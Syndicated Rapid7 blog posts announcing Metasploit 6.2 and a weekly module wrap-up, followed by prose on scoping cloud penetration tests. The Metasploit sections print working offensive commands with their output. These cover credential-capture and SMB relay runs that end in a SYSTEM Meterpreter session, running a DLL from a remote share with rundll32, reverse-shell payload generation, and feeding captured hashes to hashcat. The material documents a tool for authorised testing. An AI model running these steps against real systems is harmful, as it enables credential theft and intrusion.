Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/06/09/announcing-metasploit-6-2/

Announcing Metasploit 6.2

Metasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements, and bug fixes. Between Metasploit 6.1.0 (August 2021) and the latest 6.2.0 release, we’ve added:

  • 138 new modules
  • 148 enhancements and features
  • 156 bug fixes

Top modules

Each week, the Metasploit team publishes a Metasploit wrap-up with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).

Remote Exploitation

  • VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits CVE-2021-44228: A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as root / SYSTEM. This exploit has been tested on both Windows and Linux targets.
  • F5 BIG-IP iControl RCE via REST Authentication Bypass by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits CVE-2022-1388: This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 16.1.2.2. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the root user on affected systems.
  • VMware Workspace ONE Access CVE-2022-22954 by wvu, Udhaya Prakash, and mr_me, which exploits CVE-2022-22954: This module exploits an unauthenticated remote code execution flaw in VMware Workspace ONE Access installations; the vulnerability is being exploited broadly in the wild.
  • Zyxel Firewall ZTP Unauthenticated Command Injection by jbaines-r7, which exploits CVE-2022-30525: This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the nobody user. The vulnerability was discovered by Rapid7 researcher Jake Baines.

Local Privilege Escalation

Capture plugin

Capturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the auxiliary/server/capture namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, a new capture plugin can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address including remote interfaces via Meterpreter.

After running the load capture command, the captureg command is available (for Capture-Global), which then offers start and stop subcommands. A configuration file can be used to select individual services to start.

In the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:

msf6 > load capture
[*] Successfully loaded plugin: Credential Capture
msf6 > captureg start --ip 192.168.123.128
Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt
Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339
[+] Authentication Capture: DRDA (DB2, Informix, Derby) started
[+] Authentication Capture: FTP started
[+] HTTP Client MS Credential Catcher started
[+] HTTP Client MS Credential Catcher started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: MSSQL started
[+] Authentication Capture: MySQL started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: PostgreSQL started
[+] Printjob Capture Service started
[+] Authentication Capture: SIP started
[+] Authentication Capture: SMB started
[+] Authentication Capture: SMTP started
[+] Authentication Capture: Telnet started
[+] Authentication Capture: VNC started
[+] Authentication Capture: FTP started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: SMTP started
[+] NetBIOS Name Service Spoofer started
[+] LLMNR Spoofer started
[+] mDNS Spoofer started
[+] Started capture jobs

Opening a new terminal in conjunction with the tail command will show everything that has been captured. For instance, NTLMv2-SSP details through the SMB capture module:

$ tail -f ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt

[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.123.136
[SMB] NTLMv2-SSP Username   : EXAMPLE\Administrator
[SMB] NTLMv2-SSP Hash       : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b:0101000000000000009391080b6bd8013406d39c880c5a66000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800009391080b6bd801060004000200000008003000300000000000000001000000002000009eee3e2f941900a084d7941d60cbd5e04f91fbf40f59bfa4ed800b060921a6740a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100320033002e003100320038000000000000000000
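Conveniently, the captured value is already laid out the way offline crackers expect NetNTLMv2 material (USER::DOMAIN:challenge:proof:blob). A hypothetical helper (not part of Metasploit) for pulling those lines out of a capture log might look like:

```python
import re

def capture_log_to_hashes(log_text):
    """Pull NTLMv2-SSP hash lines out of a Metasploit capture log. The
    captured value is already in the USER::DOMAIN:challenge:proof:blob
    layout used by John the Ripper (netntlmv2) and Hashcat mode 5600."""
    pattern = re.compile(r"\[SMB\] NTLMv2-SSP Hash\s*:\s*(\S+)")
    return [m.group(1) for line in log_text.splitlines()
            if (m := pattern.match(line))]

# Truncated sample log (real challenge/proof/blob values are much longer)
log = """[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.123.136
[SMB] NTLMv2-SSP Username   : EXAMPLE\\Administrator
[SMB] NTLMv2-SSP Hash       : Administrator::EXAMPLE:1122334455667788:c77cd466:0101000000
"""
print(capture_log_to_hashes(log))
```

The extracted lines can be fed straight to a cracker, e.g. `hashcat -m 5600 hashes.txt wordlist.txt`.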

It is also possible to log directly to stdout without using the tail command:

captureg start --ip 192.168.123.128 --stdout

SMB v3 server support

This work builds upon the SMB v3 client support added in Metasploit 6.0.

Metasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption for SMB v3.

Example usage:

ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point

This can be useful for copying files onto remote targets, or for running remote DLLs:

copy \\192.168.123.1\home\example.txt .
rundll32.exe \\192.168.123.1\home\example.dll,0

All remaining Metasploit modules have now been updated to support SMB v3. Some examples:

  • exploit/windows/smb/smb_delivery: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as rundll32.exe \\192.168.123.128\tHKPx\WeHnu,0
  • exploit/windows/smb/capture: This module creates a mock SMB server that accepts credentials before returning NT_STATUS_LOGON_FAILURE. Supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking
  • exploit/windows/dcerpc/cve_2021_1675_printnightmare: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.
  • exploit/windows/smb/smb_relay: Covered in more detail below.

Enhanced SMB relay support

The windows/smb/smb_relay module has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now accept multiple targets, which Metasploit will intelligently cycle through to ensure that incoming connections are not wasted.

Example module usage:

use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run

Hashes from incoming requests are captured, and the connections are relayed to additional targets to run psexec:

msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client     : 192.168.123.4
[SMB] NTLMv2-SSP Username   : \admin
[SMB] NTLMv2-SSP Hash       : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000

[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000

A session will be opened on the relay target with the associated credentials:

msf6 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.4:52771  (192.168.123.4)

Further details can be found in the Metasploit SMB Relay documentation.

Improved pivoting / NATed services support

Metasploit has added features to the libraries that provide listening services (such as HTTP, FTP, and LDAP) so they can be bound to an explicit IP address and port combination that is independent of the SRVHOST option. This is particularly useful for modules used in scenarios where the target needs to connect to Metasploit through a NAT or port-forward configuration. This feature mimics the existing functionality provided by the reverse_tcp and reverse_http(s) payload stagers.

When a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won’t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on — in this case, the IP address that the router will forward the incoming connection to.

For example, with the network configuration:

Private IP: 172.31.21.26 (where Metasploit can bind to)
External IP: 10.2.3.4 (where the target connects to Metasploit)

The Metasploit module commands would be:

# Set where the target connects to Metasploit. ListenerBindAddress is a new option.
set srvhost 10.2.3.4
set ListenerBindAddress 172.31.21.26

# Likewise for payloads: lhost is where the target connects back, and
# ReverseListenerBindAddress (an existing option) is where Metasploit binds.
set lhost 10.2.3.4
set ReverseListenerBindAddress 172.31.21.26
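The underlying idea, binding a listener on one address while advertising another, is plain socket behavior. A minimal, self-contained sketch (ordinary Python sockets, not Metasploit code; the advertised address is a placeholder) of the bind-versus-advertise split:

```python
import socket
import threading

# Role analogues (placeholder addresses, not a real deployment):
#   ADVERTISED plays the SRVHOST role: what the target is told to dial.
#   The bind address plays the ListenerBindAddress role: where we can listen.
ADVERTISED = "10.2.3.4"

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 0))   # bind to a reachable local interface
server.listen(1)
port = server.getsockname()[1]

def serve_once():
    conn, _ = server.accept()
    conn.sendall(b"hello from listener")
    conn.close()

t = threading.Thread(target=serve_once)
t.start()

# A real target behind the port-forward would connect to (ADVERTISED, port);
# here we dial the bind address directly to show the listener is live.
client = socket.create_connection(("127.0.0.1", port))
data = client.recv(1024)
client.close()
t.join()
server.close()
print(data.decode())  # hello from listener
```

The NAT or router is responsible for forwarding traffic sent to the advertised address on to the bound one; the listener itself never needs to own the external IP.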

Debugging Meterpreter sessions

There are now two ways to debug Meterpreter sessions:

  1. Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets
  2. Generate a custom Meterpreter debug build with extra logging present

Log Meterpreter TLV packets

This can be enabled for any Meterpreter session and does not require a special debug Metasploit build:

msf6 > setg SessionTlvLogging true
SessionTlvLogging => true

Here’s an example of logging the network traffic when running the getenv Meterpreter command:

meterpreter > getenv USER

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1052 command=stdapi_sys_config_getenv>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="73717259684850511890564936718272">
  #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE    meta=STRING     value="USER">
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Response        tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="Q\xE63_onC\x9E\xD71\xDE3\xB5Q\xE24">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1052 command=stdapi_sys_config_getenv>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="73717259684850511890564936718272">
  #<Rex::Post::Meterpreter::Tlv type=RESULT          meta=INT        value=0>
  #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP       tlvs=[
    #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE    meta=STRING     value="USER">
    #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE       meta=STRING     value="demo_user">
  ]>
]>

Environment Variables
=====================

Variable  Value
--------  -----
USER      demo_user
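For intuition, a TLV stream like the one logged above can be modeled as repeated (length, type, value) records. The sketch below assumes the common convention of a 4-byte big-endian length that includes the 8-byte header, followed by a 4-byte type; the numeric type constant is made up for illustration, and real Meterpreter packets add a packet header, XOR masking, and encryption on top:

```python
import struct

def pack_tlv(tlv_type, value):
    """Pack one TLV record: 4-byte big-endian length (which includes the
    8-byte length+type header), 4-byte type, then the raw value bytes."""
    data = value.encode() if isinstance(value, str) else value
    return struct.pack(">II", 8 + len(data), tlv_type) + data

def unpack_tlvs(buf):
    """Walk a buffer of concatenated TLV records, returning (type, value) pairs."""
    records = []
    offset = 0
    while offset < len(buf):
        length, tlv_type = struct.unpack_from(">II", buf, offset)
        records.append((tlv_type, buf[offset + 8:offset + length]))
        offset += length
    return records

ENV_VARIABLE = 0x1234  # made-up type id, for illustration only
packet = pack_tlv(ENV_VARIABLE, "USER") + pack_tlv(ENV_VARIABLE, "HOME")
print(unpack_tlvs(packet))  # [(4660, b'USER'), (4660, b'HOME')]
```

Because every record is self-describing, a logger like SessionTlvLogging can walk a packet and pretty-print each TLV without knowing the command in advance.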

Meterpreter debug builds

We have added options to Meterpreter payload generation for producing debug builds with additional log statements. These payloads are useful when debugging Meterpreter sessions, developing new Meterpreter features, or attaching logs to Metasploit issue reports. To choose a prebuilt Meterpreter payload with debug functionality present, set MeterpreterDebugBuild to true. There is also configuration support for writing the log output to stdout or to a file on the remote target, e.g. by setting MeterpreterDebugLogging to rpath:/tmp/meterpreter_log.txt.

For example, within msfconsole you can generate a new payload and create a handler:

use payload/python/meterpreter_reverse_tcp
generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false
to_handler

Running the payload will show the Meterpreter log output:

$ python3 shell.py
DEBUG:root:[*] running method core_negotiate_tlv_encryption
DEBUG:root:[*] Negotiating TLV encryption
DEBUG:root:[*] RSA key: 30820122300d06092a864886f70d01010105000382010f003082010a0282010100aa0f09225ff311d136b7c2ed02e5f4c819a924bd59a2ba67ea3e36c837c1d28ba97db085acad9374a543ad0709006d835c80aa273138948ec9ff699142405819e68b8dbc3c04300dc2a93a5be4be2263b69e8282447b6250abad8056de6e7f83b20c6151d72af63c908fa5b0c3ab3a4ac92d8b335a284b0542e3bf9ef10456024df2581b22f233a84e69d41d721aa00e23ba659c4420123d5fdd78ac061ffcb74e5ba60fece415c2be982df57d13afc107b8522dc462d08247e03d63b0d6aa639784e7187384c315147a7d18296f09495ba7969da01b1fb49097295792572a01acdaf7406f2ad5b25d767d8695cc6e33d33dfeeb158a6f50d43d07dd05aa19ff0203010001
DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966
DEBUG:root:[*] Encrypted AES key: 0x741a972aa2e95260279dc658f4b611ca2039a310ebb834dee47342a5809a68090fed0a87497f617c2b04ecf8aa1d6253cda0a513ccb53b4acc91e89b95b198dce98a0908a4edd668ff51f2fa80f4e2c6bc0b5592248a239f9a7b30b9e53a260b92a3fdf4a07fe4ae6538dfc9fa497d02010ee67bcf29b38ec5a81d62da119947a60c5b35e8b08291825024c734b98c249ad352b116618489246aebd0583831cc40e31e1d8f26c99eb57d637a1984db4dc186f8df752138f798fb2025555802bd6aa0cebe944c1b57b9e01d2d9d81f99a8195222ef2f32de8dfbc150286c122abdc78f19246e5ad65d765c23ba762fe95182587bd738d95814a023d31903c2a46
DEBUG:root:[*] TLV encryption sorted
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_set_session_guid
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_enumextcmd
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_enumextcmd
DEBUG:root:[*] sending response packet
... etc ...

For full details, see the Debugging Meterpreter Sessions documentation.

User-contributable docs

We have now released user-contributable documentation for Metasploit, available at https://docs.metasploit.com/. This new site provides a searchable source of information on multiple topics.

Contributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the docs folder.

Local exploit suggester improvements

The post/multi/recon/local_exploit_suggester post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.

Now with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:

msf6 post(multi/recon/local_exploit_suggester) > run session=-1
... etc ...
[*] ::1 - Valid modules for session 3:
============================
 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                 Yes                      The target is vulnerable.
 2   exploit/linux/local/cve_2022_0847_dirtypipe                         Yes                      The target appears to be vulnerable. Linux kernel version found: 5.14.0
 3   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/desktop_privilege_escalation                    Yes                      The target is vulnerable.
 5   exploit/linux/local/network_manager_vpnc_username_priv_esc          Yes                      The service is running, but could not be validated.
 6   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 7   exploit/linux/local/polkit_dbus_auth_bypass                         Yes                      The service is running, but could not be validated. Detected polkit framework version 0.105.
 8   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 9   exploit/android/local/futex_requeue                                 No                       The check raised an exception.
 10  exploit/linux/local/abrt_raceabrt_priv_esc                          No                       The target is not exploitable.
 11  exploit/linux/local/abrt_sosreport_priv_esc                         No                       The target is not exploitable.
 12  exploit/linux/local/af_packet_chocobo_root_priv_esc                 No                       The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable
 13  exploit/linux/local/af_packet_packet_set_ring_priv_esc              No                       The target is not exploitable.
 14  exploit/linux/local/apport_abrt_chroot_priv_esc                     No                       The target is not exploitable.
 15  exploit/linux/local/asan_suid_executable_priv_esc                   No                       The check raised an exception.
 16  exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc          No                       The target is not exploitable.

Setting the option verbose=true will now also highlight modules that weren’t considered as part of the module suggestion phase due to session platform/arch/type mismatches. This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.

Upcoming roadmap work

In addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.

Get it

Existing Metasploit Framework users can update to the latest release of Metasploit Framework via the msfupdate command.

New users can either download the latest release through our nightly installers, or if you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest release.


Metasploit Wrap-Up

Post Syndicated from Simon Janusz original https://blog.rapid7.com/2022/04/08/metasploit-wrap-up-151/

Windows Local Privilege Escalation for standard users

Metasploit Wrap-Up

In this week’s release, we have an exciting new module added by our very own Grant Willcox, which exploits [CVE-2022-26904](https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904) and allows normal users to execute code as NT AUTHORITY\SYSTEM on Windows machines from Windows 7 up to and including Windows 11. Currently, the vulnerability is still unpatched and there have been no updates from MSRC regarding it; however, it may be patched on the next Patch Tuesday.

This exploit requires more than one local user to be present on the machine and the PromptOnSecureDesktop setting to be set to 1, which is the default setting.
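On a target, that prerequisite can be checked by querying the UAC policy key. The helper below is hypothetical (not part of the module): it just parses the output of `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop`, assuming the standard reg.exe output layout:

```python
import re

def prompt_on_secure_desktop_enabled(reg_output):
    """Return True when PromptOnSecureDesktop is set to 1 (the default),
    i.e. the exploit's prerequisite is met."""
    m = re.search(r"PromptOnSecureDesktop\s+REG_DWORD\s+0x([0-9a-fA-F]+)",
                  reg_output)
    return bool(m) and int(m.group(1), 16) == 1

# Sample reg.exe output (layout assumed from the standard `reg query` format)
sample = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    PromptOnSecureDesktop    REG_DWORD    0x1
"""
print(prompt_on_secure_desktop_enabled(sample))  # True
```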

macOS exploitation

Our very own space-r7 has updated the recent Gatekeeper module to add support for the recent CVE-2022-22616, which can be used to target all macOS Catalina versions, as well as macOS Monterey versions prior to 12.3.

This module can be used to remove the com.apple.quarantine extended attribute on a downloaded/extracted file and allows for code to be executed on the machine.

Enumerating Chocolatey applications

This week’s release also features a new module from a first-time contributor rad10, which will enumerate all applications that have been installed using Chocolatey.

This could be used when gathering information about a compromised target and potentially vulnerable software present on the machine.

New module content (5)

  • User Profile Arbitrary Junction Creation Local Privilege Elevation by Grant Willcox and KLINIX5, which exploits CVE-2022-26904 – This adds an exploit for CVE-2022-26904, which is an LPE vulnerability affecting Windows 7 through Windows 11. Leveraging this vulnerability can allow a local attacker running as a standard user, who has knowledge of another standard user’s credentials, to execute code as NT AUTHORITY\SYSTEM. The PromptOnSecureDesktop setting must also be set to 1 on the affected machine for this exploit to work, which is the default setting.
  • ALLMediaServer 1.6 SEH Buffer Overflow by Hejap Zairy Al-Sharif, which exploits CVE-2022-28381 – A new module has been added which exploits CVE-2022-28381, a remotely exploitable SEH buffer overflow vulnerability in ALLMediaServer version 1.6 and prior. Successful exploitation results in remote code execution as the user running ALLMediaServer.
  • Windows Gather Installed Application Within Chocolatey Enumeration by Nick Cottrell – This adds a post module that enumerates applications installed with Chocolatey on Windows systems.
  • #16082 from usiegl00 – This updates the shadow_mitm_dispatcher module by adding a new RubySMB Dispatcher, which allows better integration with RubySMB and enables the use of all the features provided by its client. Both SMBv2 and SMBv3 are now supported.
  • #16401 from space-r7 – This change adds support for CVE-2022-22616 to the existing Gatekeeper bypass exploit module, which reportedly covers all macOS Catalina versions through macOS Monterey versions below 12.3. Since the module now targets two CVEs, we’ve introduced a new CVE option to select which one to exploit. The default is the most recent CVE.

Enhancements and features (4)

  • #15972 from sempervictus – This updates the Log4shell scanner with the LEAK_PARAMS option, providing a way to leak more target information such as environment variables.
  • #16320 from dwelch-r7 – This updates Windows Meterpreter payloads to support a new MeterpreterDebugBuild datastore option. When set to true, the generated payload will have additional logging support, visible via Windows’ DbgView program.
  • #16373 from adfoster-r7 – Adds initial support for Ruby 3.1
  • #16403 from sempervictus – This adds more checks to the post/windows/gather/checkvm module to better detect if the current target is a Qemu / KVM virtual machine.

Bugs fixed (3)

  • #16398 from jmartin-r7 – A number of recently added payloads did not conform to the patterns used for suggesting spec configurations. Tests for these payloads have now been manually added to ensure they are appropriately exercised as part of rspec checks.
  • #16408 from rtpt-alexanderneumann – This fixes an edge case with the multi/postgres/postgres_copy_from_program_cmd_exec module, which crashed when the randomly generated table name started with a number
  • #16419 from adfoster-r7 – A bug has been fixed whereby when using the search command and searching by disclosure_date, the help menu would instead appear. This has been remedied by improving the date handling logic for the search command.
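The pitfall behind the postgres_copy_from_program_cmd_exec fix is a general one: PostgreSQL identifiers that start with a digit are invalid unless quoted. A small sketch (hypothetical helper, not the module's actual code) of generating names that sidestep it:

```python
import random
import string

def rand_sql_identifier(length=8, rng=random):
    """Build a random identifier that is always valid unquoted in
    PostgreSQL: a leading letter followed by alphanumerics."""
    first = rng.choice(string.ascii_lowercase)
    rest = "".join(rng.choice(string.ascii_lowercase + string.digits)
                   for _ in range(length - 1))
    return first + rest

names = [rand_sql_identifier() for _ in range(5)]
print(names)
```

Constraining only the first character keeps the name space large while guaranteeing the generated table name never needs quoting.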

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Cloud Pentesting, Pt. 3: The Impact of Ecosystem Maturity

Post Syndicated from Eric Mortaro original https://blog.rapid7.com/2022/04/04/cloud-pentesting-pt-3-the-impact-of-ecosystem-maturity/

Cloud Pentesting, Pt. 3: The Impact of Ecosystem Maturity

Now that we’ve covered the basics of cloud pentesting and the style in which a cloud environment could be attacked, let’s turn our attention to the entirety of this ecosystem. This environment isn’t too different from the on-premises ecosystem that traditional penetration testing is performed on. Who doesn’t want to gain internal access to the client’s environment from an external perspective? Recently, one consultant obtained firewall access because default credentials had never been changed and the management interface was publicly exposed. Or how about gaining a shell on a web server because of misconfigurations?

Typically, a client with a bit more maturity beyond just a vulnerability management program will shift gears to doing multiple pentests against their environments: external, internal, web app, mobile app, wireless, and potentially more. By doing these types of pentests, clients can better understand which aspects of their ecosystem are failing and which are doing fine. This is no different when their infrastructure is deployed in the cloud.

Cloud implementation maturity

There’s an old saying that one must learn how to crawl before walking and how to walk before running. That same adage runs true for pentesting. Pentesting a network before ever having some sort of vulnerability management program can certainly show the weaknesses within the network, but it may not show the true depth of the issue.

The same holds true with Red Teams. You wouldn’t want to immediately jump on the Red Team pentesting bandwagon without having gone through multiple iterations of pentesting to true up gaps within the environment. Cloud pentesting should be treated in the same manner.  

The maturity of a company’s cloud implementation will help determine the depth in which a cloud pentest can occur, if it can occur at all! To peel this orange back a bit, let’s say a company wants a cloud ecosystem pentest. Discovery calls to scope the project will certainly help uncover how a customer implements their cloud environment, but what if it’s a basic approach? As in, there is no use of cloud-native deployments, all user accounts have root access, tagging of assets within the environment is not implemented, and so on. Where does this leave a pentest?  

In this particular case, an ecosystem pentest is not feasible at this juncture. The more basic approaches, such as vulnerability management or running the cloud vendor’s built-in configuration checks, would most certainly be ideal. Again, crawl before you walk, and walk before you run. This would look more like a traditional pentest, where an external and an internal test are performed.

What if the client is very mature in their implementation of cloud? Now we’re talking! User accounts are not root, IAM roles are leveraged instead of users, departments have separate permission profiles, the environment utilizes cloud native deployments as much as possible, and there’s separation of department environments by means of accounts, access control lists (ACLs), or virtual private clouds (VPCs). This now becomes the cloud ecosystem pentest that will show gaps within the environment — with the understanding that the customer has implemented, to the best of their abilities, controls that are baked into the cloud platform.

Maturity example

I’ve had the absolute pleasure of chatting with a ton of potential customers who are interested in performing a cloud ecosystem pentest. These conversations not only help me understand how a customer needs their pentest to be structured, but they also help me understand how we can improve our offering at Rapid7. One particular case stood out to me and helped me understand that some customers are simply not ready to move to a cloud-native deployment.

In discussing Rapid7’s approach to cloud ecosystem pentesting, we typically ask what types of services the customer uses with their respective cloud vendor. In this discussion with this particular customer, we discovered they were using Kubernetes (K8s) quite extensively. After we asked a few more questions, it turned out that the customer wasn’t using K8s from a cloud-native perspective — rather, they had installed Kubernetes on their own virtual machines and were administering it from there. The reason behind this was that they just weren’t ready yet to fully transition to a cloud vendor running other parts of their infrastructure.  

Now, this is a bit of a head-scratcher, because in this type of scenario, they’re taking on more of the support than is necessary. Who am I to argue, though?  The customer and I had a very fruitful conversation, which actually led us both to a deeper understanding of not only their business approach but also their IT infrastructure strategy.

So, in this particular instance, if we were to pentest K8s that this customer deployed onto their virtual machines, how far could we go? Well, since they own the entire stack — from the operating system, to the software, to the actual containers — we can go as far as we can go. If, however, this had been deployed from a cloud-native perspective, we would have restrictions due to the cloud vendor’s terms of services.

One major restriction is container escapes, which are out of scope. This goes back to the shared environment that has made cloud so successful. If Rapid7 were able to perform a container escape, not only would it be severely out of scope, but Rapid7 would most certainly report the exploit to the cloud vendor itself. A finding like that is the dream of a white hat hacker in a bug bounty program, where it could pay out tens of thousands of dollars!

But while that isn’t exactly how all cloud pentests turn out, they can still be done just as effectively as traditional on-premise pentests. It just requires a clear understanding of how the customer has deployed their cloud ecosystem, how mature their implementation is, and what is in and out of scope for a pentest based on those factors.


Cloud Pentesting, Pt. 2: Testing Across Different Deployments

Post Syndicated from Eric Mortaro original https://blog.rapid7.com/2022/03/29/cloud-pentesting-pt-2-testing-across-different-deployments/


In part one of this series, we broke down the various types of cloud deployments. So, pentesting in the cloud is just like on-prem, right? (Who asks these loaded questions!?)  

The answer is yes and no. It depends on how a customer has set up their cloud deployment. Let’s cover a few basics first, because this will really clear things up.

Each cloud vendor has their own unique restrictions on what can and cannot be attacked, due to the nature of how the cloud is architected. Most have very similar restrictions — however, these rules must be followed, or one could quickly find themselves outside of scope. The next sections will outline which parts of the “as-a-service” components are out of scope for testing, and which are in scope.

Infrastructure as a service

This, in my experience, is how most clients have set up their cloud deployment. The as-a-service model may simply have been the quickest way to appease a C-level executive who asked their directors and managers to go all-in on cloud. This is the direct lift from on-premise to the cloud that we discussed in the last post.

When it comes to testing this type of deployment, the scope is the largest it can be, with very few exceptions. The likely scenario is an "assumed breach" approach in which the tester is dropped directly into a virtual private cloud (VPC): the client deploys a virtual machine, allows inbound access from the tester's IP address, and grants access via an SSH keypair.

Some exceptions to this testing that are OUT of scope include:

  • Attacking auto-scaling functions and network address translation (NAT) gateways
  • Exploiting the software that was used to deploy compute instances, or changing NAT configuration

Some items that are IN scope for this deployment model include:

  • Attacking the operating system and attempting exploitation against outdated versions
  • Exploiting the software or applications installed on the operating system

Platform as a service

You’ve heard of bring your own device (BYOD) — think of this as BYOS, or bring your own software. Platform as a service (PaaS) brings us up a level in terms of support requirements. With this approach, clients can utilize a cloud provider’s products that allow a client to bring their own code for things like web applications. A client no longer has to work on keeping their operating system up to date. The code is typically deployed on something like a container, which could cost the client much less than that of having to deploy a virtual machine, licensing for an operating system, vulnerability management of the operating system, and staffing considerations. There are again exceptions, however, to what can and can’t be tested.  

In this example, the following would be considered OUT of scope:

  • The host itself and/or containers hosting the application
  • Attempting to escape containers where the application is hosted

The items which are IN scope for this deployment model include:

  • Attempting to exploit the application that is installed on the operating system itself

Software as a service

